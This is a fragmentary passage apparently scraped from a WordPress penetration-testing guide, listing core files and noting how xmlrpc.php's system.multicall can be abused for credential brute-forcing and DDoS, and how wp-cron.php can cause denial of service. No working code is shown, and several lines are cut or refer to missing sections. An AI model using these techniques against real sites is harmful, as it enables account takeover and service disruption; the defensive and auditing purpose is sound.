license.txtcontains useful information such as the version WordPress installed.
wp-activate.phpis used for the email activation process when setting up a new WordPress site.
xmlrpc.phpis a file that represents a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.
wp-contentfolder is the main directory where plugins and themes are stored.
wp-content/uploads/Is the directory where any files uploaded to the platform are stored.
wp-config.phpfile contains information required by WordPress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
xml-rpc.phpis active you can perform a credentials brute-force or use it to launch DoS attacks to other resources. (You can automate this process using this for example).
system.multicallas you can try several credentials on the same request:
system.multicallin the previous section to learn how to abuse this method to cause DDoS.
/wp-cron.phpWhen this file is accessed a "heavy" MySQL query is performed, so I could be used by attackers to cause a DoS. Also, by default, the
wp-cron.phpis called on every page load (anytime a client requests any Wordpress page), which on high-traffic sites can cause problems (DoS).
wp-admin.phpfile and only allow access internally or from certain IP addresses.